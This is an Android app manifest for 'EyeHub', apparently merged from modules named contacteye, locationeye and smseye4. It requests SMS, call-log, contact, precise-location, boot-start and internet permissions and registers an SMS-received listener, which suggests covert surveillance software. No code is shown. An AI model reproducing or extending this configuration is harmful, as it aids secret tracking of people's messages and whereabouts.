<?xml version='1.0' encoding='utf-8'?>
<manifest xmlns:ns0="http://schemas.android.com/apk/res/android" xmlns:android="http://schemas.android.com/apk/res/android" package="com.xbibz.eyehub">
  <uses-permission ns0:name="abyssalarmy.locationeye.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" />
  <uses-permission ns0:name="abyssalarmy.smseye4.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" />
  <uses-permission ns0:name="android.permission.ACCESS_COARSE_LOCATION" />
  <uses-permission ns0:name="android.permission.ACCESS_FINE_LOCATION" />
  <uses-permission ns0:name="android.permission.FOREGROUND_SERVICE" />
  <uses-permission ns0:name="android.permission.FOREGROUND_SERVICE_LOCATION" />
  <uses-permission ns0:name="android.permission.INTERNET" />
  <uses-permission ns0:name="android.permission.READ_CALL_LOG" />
  <uses-permission ns0:name="android.permission.READ_CONTACTS" />
  <uses-permission ns0:name="android.permission.READ_SMS" />
  <uses-permission ns0:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission ns0:name="android.permission.RECEIVE_SMS" />
  <uses-permission ns0:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
  <uses-permission ns0:name="com.example.contacteye.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" />
  <application android:allowBackup="true" android:label="&quot;EyeHub&quot;" android:icon="@mipmap/ic_launcher">
    <activity ns0:name="com.xbibz.eyehub.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity ns0:theme="@style/Theme.Contacteye" ns0:label="@string/app_name" ns0:name="com.example.contacteye.Activity" ns0:exported="true">
      <intent-filter>
        <action ns0:name="android.intent.action.MAIN" />
        <category ns0:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <provider ns0:name="androidx.startup.InitializationProvider" ns0:exported="false" ns0:authorities="com.example.contacteye.androidx-startup">
      <meta-data ns0:name="androidx.emoji2.text.EmojiCompatInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.lifecycle.ProcessLifecycleInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.profileinstaller.ProfileInstallerInitializer" ns0:value="androidx.startup" />
    </provider>
    <receiver ns0:name="androidx.profileinstaller.ProfileInstallReceiver" ns0:permission="android.permission.DUMP" ns0:enabled="true" ns0:exported="true" ns0:directBootAware="false">
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.INSTALL_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SKIP_FILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SAVE_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.BENCHMARK_OPERATION" />
      </intent-filter>
    </receiver>
    <activity ns0:theme="@style/Theme.Locationeye" ns0:label="@string/app_name" ns0:name="abyssalarmy.locationeye.activity.MainActivity" ns0:exported="true">
      <intent-filter>
        <action ns0:name="android.intent.action.MAIN" />
        <category ns0:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <service ns0:name="abyssalarmy.locationeye.service.MainService" ns0:foregroundServiceType="location" />
    <receiver ns0:name="abyssalarmy.locationeye.receiver.BootReceiver" ns0:exported="false">
      <intent-filter>
        <action ns0:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
    <activity ns0:theme="@android:style/Theme.Translucent.NoTitleBar" ns0:name="com.google.android.gms.common.api.GoogleApiActivity" ns0:exported="false" />
    <meta-data ns0:name="com.google.android.gms.version" ns0:value="@integer/google_play_services_version" />
    <provider ns0:name="androidx.startup.InitializationProvider" ns0:exported="false" ns0:authorities="abyssalarmy.locationeye.androidx-startup">
      <meta-data ns0:name="androidx.emoji2.text.EmojiCompatInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.lifecycle.ProcessLifecycleInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.profileinstaller.ProfileInstallerInitializer" ns0:value="androidx.startup" />
    </provider>
    <receiver ns0:name="androidx.profileinstaller.ProfileInstallReceiver" ns0:permission="android.permission.DUMP" ns0:enabled="true" ns0:exported="true" ns0:directBootAware="false">
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.INSTALL_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SKIP_FILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SAVE_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.BENCHMARK_OPERATION" />
      </intent-filter>
    </receiver>
    <activity ns0:theme="@style/Theme.Smseye" ns0:label="@string/app_name" ns0:name="abyssalarmy.smseye4.Activity" ns0:exported="true">
      <intent-filter>
        <action ns0:name="android.intent.action.MAIN" />
        <category ns0:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <receiver ns0:name="abyssalarmy.smseye4.core.Receiver" ns0:permission="android.permission.BROADCAST_SMS" ns0:exported="true">
      <intent-filter>
        <action ns0:name="android.provider.Telephony.SMS_RECEIVED" />
      </intent-filter>
    </receiver>
    <provider ns0:name="androidx.startup.InitializationProvider" ns0:exported="false" ns0:authorities="abyssalarmy.smseye4.androidx-startup">
      <meta-data ns0:name="androidx.emoji2.text.EmojiCompatInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.lifecycle.ProcessLifecycleInitializer" ns0:value="androidx.startup" />
      <meta-data ns0:name="androidx.profileinstaller.ProfileInstallerInitializer" ns0:value="androidx.startup" />
    </provider>
    <receiver ns0:name="androidx.profileinstaller.ProfileInstallReceiver" ns0:permission="android.permission.DUMP" ns0:enabled="true" ns0:exported="true" ns0:directBootAware="false">
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.INSTALL_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SKIP_FILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.SAVE_PROFILE" />
      </intent-filter>
      <intent-filter>
        <action ns0:name="androidx.profileinstaller.action.BENCHMARK_OPERATION" />
      </intent-filter>
    </receiver>
  </application>
</manifest>